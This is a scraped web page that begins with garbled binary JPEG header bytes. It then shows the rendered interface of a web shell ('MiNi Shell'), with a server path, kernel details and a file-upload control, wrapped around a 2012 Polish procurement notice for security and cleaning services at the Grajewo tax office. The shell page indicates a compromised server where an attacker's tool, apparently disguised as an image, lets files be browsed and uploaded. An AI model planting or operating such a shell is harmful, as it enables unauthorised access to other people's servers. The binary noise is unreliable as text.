JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/475506-N-2012.html

<p class="kh_header"><b>Grajewo: Usługa ochrony fizycznej osób i mienia oraz sprzątania obiektu i posesji Urzędu Skarbowego w Grajewie</b><br>
<b>Numer ogłoszenia: 475506 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Grajewie , ul. Elewatorska 8, 19-203 Grajewo, woj. podlaskie, tel. 086 2723245, faks 086 2722808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://us-grajewo.pbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony fizycznej osób i mienia oraz sprzątania obiektu i posesji Urzędu Skarbowego w Grajewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w zakresie ochrony obiektu i posesji Urzędu Skarbowego w Grajewie jest wykonywanie całodobowej ochrony fizycznej, zgodnie z przepisami ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr. 145 poz. 1221 ze zm.) oraz monitorowanie sygnałów pochodzących z systemów alarmowych i p. poż., w celu zapewnienia bezpieczeństwa znajdującym się na terenie chronionym osobom, mieniu i  informacjom a w szczególności;
1.zapobieganie zakłóceniom ładu, porządku i bezpieczeństwa na terenie chronionego obiektu,
2.zapobieganie kradzieżom oraz niszczeniu mienia oraz przetwarzanych informacji,
3.wykonywanie zadań służb ochrony wynikających z ogłaszanych stopni alarmowych oraz z odrębnych instrukcji,
4.podejmowanie interwencji w przypadku kradzieży, włamania, rozboju, napadu  lub naruszenia porządku publicznego na terenie chronionego obiektu,
5.powiadamianie właściwych terytorialnie jednostek Policji, Straży Pożarnej, Straży Miejskiej o zaistniałych zagrożeniach na terenie chronionych nieruchomości,
6.współpraca z Policją i Straż Miejską podczas zaprowadzania porządku publicznego w chronionym obiekcie i na terenie do niego przyległym, a także z innymi uprawnionymi służbami w przypadku występowania zagrożeń dla bezpieczeństwa osób, mienia lub informacji, 
7.zabezpieczanie miejsca zdarzeń do czasu przybycia odpowiednich służb, 
8.powiadamiania odpowiednich służb Zamawiającego oraz instytucji zewnętrznych o awariach związanych z funkcjonowaniem urządzeń technicznych lub uszkodzeniem instalacji wodnej, elektrycznej lub innymi zdarzeniami losowymi powodującymi zagrożenie bezpieczeństwa lub  ciągłości pracy Zamawiającego,
9.wykonywanie obchodów chronionych nieruchomości, celem sprawdzenia zamknięcia okien i drzwi oraz bramy wjazdowej,
10.otwieranie i zamykania drzwi wejściowych do budynku urzędu, przed rozpoczęciem pracy  oraz po zakończeniu,  
11.wydawanie kluczy do pomieszczeń upoważnionym osobom, a po zakończeniu przez nich pracy, sprawdzenie stanu zdanych kluczy od pomieszczeń biurowych i ich przechowywanie,
12.obsługę centrali telefonicznej urzędu zgodnie ze standardami obsługi klientów - łączenie rozmów telefonicznych,
13.prowadzenie ewidencji zamawianych przez pracowników, służbowych rozmów telefonicznych,
14.obsługę systemu p. poż. oraz alarmowego,
15.zapewnienie sprawności i użyteczności systemu alarmowego, systemu p.poż oraz urządzeń monitorujących poprzez:
a)wykonywanie okresowych przeglądów,
b)wykonywanie okresowych (co 3 miesiące) kontroli sprawności urządzeń zabezpieczających (m. in. poprzez sprawdzanie: działania czujek, sygnalizatorów,  przycisków napadowych, urządzeń monitoringu),
c)wymianę lub naprawę niesprawnych elementów technicznych systemu alarmowego na koszt własny.

Przedmiotem zamówienia w zakresie w zakresie sprzątania obiektu i posesji jest:

Codziennie - budynek biurowy
1.odkurzanie wykładzin podłogowych typu dywanowego o łącznej pow. - ok. 270 m2,
2.mycie i pielęgnacja wykładziny PCV o łącznej powierzchni - ok. 40  m2,
3.mycie i pielęgnacja terakoty, gresu o łącznej powierzchni - ok. 80 m2,
4.czyszczenie i wycieranie kurzu z powierzchni biurek, szaf, szafek, stolików i innego sprzętu biurowego oraz parapetów, pulpitów, listew ściennych itp.,
5.usuwanie pajęczyn w pomieszczeniach biurowych, korytarzach, klatkach schodowych,
6.sprzątanie i mycie toalet - 4 szt. o łącznej powierzchni 19,20m2, mycie armatury, luster oraz dezynfekcja urządzeń sanitarnych,
7.uzupełnianie w miarę zużycia środków higieny i czystości w: 
a)papier toaletowy pobielany zgodny z normą PN-85/P-50546 o gramaturze w granicach 35-38g/m2,  
b)ręczniki papierowe, 
c)mydło w płynie,  
d)środki czystości do WC (aplikowane bezpośrednio do muszli, w kostce lub w żelu),
e)środki zapachowe do toalet w sprayu lub w żelu (odświeżacze powietrza)
8.opróżnianie koszy na śmieci wraz z wymianą worków - ok. 30 szt.,
9.opróżnianie pojemników niszczarek i ich wyposażenie w worki foliowe - 3 szt.
10.przecieranie powierzchni na drzwiach oszklonych wejściowych do budynku,
11.mycie przeszkleń w szafkach w pomieszczeniach biurowych, w punkcie obsługi klienta itp
1 raz w tygodniu - budynek biurowy
1.mycie środkiem dezynfekującym podłóg i powierzchni ściennych wykafelkowanych  w toaletach,
2.przecieranie kaloryferów,
3.mycie i wycieranie kurzu z kontaktów, korytek kablowych, wyłączników oświetleniowych, gaśnic,
4.mycie drzwi.

1 raz w miesiącu:- budynek biurowy
1.mycie sprzętu komputerowego i innych urządzeń biurowych (niszczarki drukarki, telefony itp) specjalistycznymi środkami,
2.odkurzanie mebli tapicerowanych i usuwanie z nich plam,
3.mycie podłóg PCV za pomocą specjalistycznych środków chemicznych,
4.dokładne mycie wszystkich drzwi, szaf i kaloryferów,
5.mycie poręczy, barierek na klatce schodowej,

- tereny zielone

1.utrzymanie zieleni w sezonie letnim (koszenie trawy, przycinanie krzewów i drzew),

- tereny utwardzone

1.sprzątanie całej posesji oraz zamiatanie chodników o powierzchni - ok. 50m2 ,

1 raz na pół roku (maj,wrzesień)

- budynek biurowy

1.mycie okien i parapetów -  szt. 36 (powierzchnia okien - ok. 98 m2),

- budynek pomocniczy

1.sprzątanie pomieszczeń archiwum, kotłowni olejowej, magazynu druków łączna pow. - ok 50 m2

1 raz w roku (maj)

- budynek biurowy

1.pranie wykładziny dywanowej odkurzaczem piorącym,
2.mechaniczne czyszczenie wertikali i rolet,
3.mechaniczne czyszczenie mebli tapicerowanych, po uzgodnieniu z Zamawiającym,


- budynek pomocniczy

1.mycie okien i parapetów -  szt. 11 (powierzchnia okien - ok. 30 m2),

Doraźnie w miarę potrzeby - posesja

1.w okresie jesiennym usuwanie spadłych liści, grabienie trawnika,
2.w okresie zimowym odśnieżanie, usuwanie oblodzeń i posypywanie środkami antypoślizgowymi, jak również usuwanie zalegającego śniegu na obszarze terenów utwardzonych z posesji Urzędu oraz terenów przylegającym do posesji za utrzymanie których odpowiedzialny jest zarządca obiektu,
3.wykonywanie obowiązków administratora obiektu w zakresie zapobiegania skutkom gołoledzi na trasach komunikacji pieszej.
4.pielęgnowanie kwiatów, podlewanie, zasilanie nawozami,
5.dosiewanie trawy,

Doraźnie w miarę potrzeby  - budynek biurowy i pomocniczy
1.sprzątanie na żądanie Zamawiającego pomieszczeń biurowych i toalet w budynku pomocniczym - nie częściej niż 2 razy w roku
2.usuwanie sopli z obrzeży dachowych,
3.usuwanie nadmiaru śniegu z dachu,
4.usuwanie liści z rynien.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 90.91.00.00-9, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 3 do SIWZ, 
2) wykaz wykonanych i wykonywanych usług, stanowiący załącznik nr 4 do SIWZ, w którym wykaże co najmniej dwie usługi odpowiadające swoim rodzajem usługom  stanowiącym przedmiot zamówienia oraz dołączy dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 3 do SIWZ, 
2) opłacona polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://us-grajewo.pbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Grajewie
ul. Elewatorska 8
19 - 200 Grajewo
I piętro, pok. nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 12:00, miejsce: Urząd Skarbowy w Grajewie
ul. Elewatorska 8
19 - 200 Grajewo
I piętro, pok. nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com